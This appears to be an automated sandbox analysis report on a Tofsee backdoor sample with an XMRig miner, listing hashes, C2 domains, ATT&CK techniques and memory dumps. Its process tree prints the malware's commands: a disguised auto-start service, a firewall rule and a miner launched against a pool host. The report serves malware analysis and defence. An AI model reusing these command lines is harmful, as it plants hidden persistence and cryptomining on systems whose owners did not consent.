Overview

overview

10

Static

static

dridex

windows10-1703-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    156s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    30-11-2022 10:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f03135f07294b83f13c2afd0730b9aa0c0af66d06eebe96fd57821987af85965.exe

  • Size

    184KB

  • MD5

    99ac617cfb5aa5bc8cffb4c749178add

  • SHA1

    a5a9cb91d2081568fd5c0e4842e6c4e659e2c84a

  • SHA256

    f03135f07294b83f13c2afd0730b9aa0c0af66d06eebe96fd57821987af85965

  • SHA512

    502df93bdea2c97fadf6c5cb4d35788b2e02c8a56c355131a55d62c73c8ed83d95ff7abac8c12311c5b561080d1893fecce201511d9f7c3a9bf163de254180b5

  • SSDEEP

    3072:CDbMlfKRw8TiJIK5Ct2VZWA30KwbxttL90s9Jxu:cMX8TilWA30KQtv0s9n

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f03135f07294b83f13c2afd0730b9aa0c0af66d06eebe96fd57821987af85965.exe
    "C:\Users\Admin\AppData\Local\Temp\f03135f07294b83f13c2afd0730b9aa0c0af66d06eebe96fd57821987af85965.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3176
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\aynkness\
      2⤵
        PID:4876
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\icemicib.exe" C:\Windows\SysWOW64\aynkness\
        2⤵
          PID:4216
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create aynkness binPath= "C:\Windows\SysWOW64\aynkness\icemicib.exe /d\"C:\Users\Admin\AppData\Local\Temp\f03135f07294b83f13c2afd0730b9aa0c0af66d06eebe96fd57821987af85965.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:2916
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description aynkness "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:4360
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start aynkness
          2⤵
          • Launches sc.exe
          PID:3708
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:5008
      • C:\Windows\SysWOW64\aynkness\icemicib.exe
        C:\Windows\SysWOW64\aynkness\icemicib.exe /d"C:\Users\Admin\AppData\Local\Temp\f03135f07294b83f13c2afd0730b9aa0c0af66d06eebe96fd57821987af85965.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4956
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:2540
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4868

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\icemicib.exe
        Filesize

        12.9MB

        MD5

        6667021d5f48ae2bad39eed3089f668b

        SHA1

        d3a8258d97f9cdf8373d6b2f1190364c25bc1a1f

        SHA256

        07a9c2d18d629bb532e2f0876d803c815fcbbb27cc2162122ba0a5ac90cdf7f8

        SHA512

        e42a00bbf4c83eb215f863f80cdd0ce2f7aee61fcfaee5348e1e4bd572979b5909eee2719f199c0389bb0db095348141d5bbc272abd8b85b776f522e06763fc8

        Download Submit
      • C:\Windows\SysWOW64\aynkness\icemicib.exe
        Filesize

        12.9MB

        MD5

        6667021d5f48ae2bad39eed3089f668b

        SHA1

        d3a8258d97f9cdf8373d6b2f1190364c25bc1a1f

        SHA256

        07a9c2d18d629bb532e2f0876d803c815fcbbb27cc2162122ba0a5ac90cdf7f8

        SHA512

        e42a00bbf4c83eb215f863f80cdd0ce2f7aee61fcfaee5348e1e4bd572979b5909eee2719f199c0389bb0db095348141d5bbc272abd8b85b776f522e06763fc8

        Download Submit
      • memory/2540-484-0x0000000003100000-0x0000000003115000-memory.dmp
        Filesize

        84KB

        Download
      • memory/2540-406-0x0000000003100000-0x0000000003115000-memory.dmp
        Filesize

        84KB

        Download
      • memory/2540-295-0x0000000003109A6B-mapping.dmp
        Download
      • memory/2916-180-0x0000000000000000-mapping.dmp
        Download
      • memory/2916-186-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2916-185-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2916-183-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2916-184-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2916-182-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/2916-181-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-156-0x0000000000400000-0x0000000000463000-memory.dmp
        Filesize

        396KB

        Download
      • memory/3176-163-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-129-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-130-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-131-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-132-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-133-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-134-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-135-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-137-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-138-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-139-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-140-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-141-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-142-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-143-0x0000000000470000-0x000000000051E000-memory.dmp
        Filesize

        696KB

        Download
      • memory/3176-144-0x0000000002050000-0x0000000002063000-memory.dmp
        Filesize

        76KB

        Download
      • memory/3176-145-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-146-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-147-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-148-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-149-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-150-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-151-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-152-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-153-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-154-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-155-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-115-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-157-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-158-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-159-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-160-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-161-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-162-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-128-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-164-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-165-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-166-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-116-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-117-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-118-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-222-0x0000000000400000-0x0000000000463000-memory.dmp
        Filesize

        396KB

        Download
      • memory/3176-219-0x0000000002050000-0x0000000002063000-memory.dmp
        Filesize

        76KB

        Download
      • memory/3176-119-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-120-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-121-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-122-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-123-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-124-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-125-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-127-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3176-126-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/3708-196-0x0000000000000000-mapping.dmp
        Download
      • memory/4216-172-0x0000000000000000-mapping.dmp
        Download
      • memory/4216-176-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4216-174-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4216-175-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4216-173-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4216-178-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4360-189-0x0000000000000000-mapping.dmp
        Download
      • memory/4868-519-0x000000000249259C-mapping.dmp
        Download
      • memory/4876-169-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4876-171-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4876-170-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4876-168-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4876-167-0x0000000000000000-mapping.dmp
        Download
      • memory/4876-177-0x0000000077D30000-0x0000000077EBE000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4956-303-0x0000000000400000-0x0000000000463000-memory.dmp
        Filesize

        396KB

        Download
      • memory/5008-213-0x0000000000000000-mapping.dmp
        Download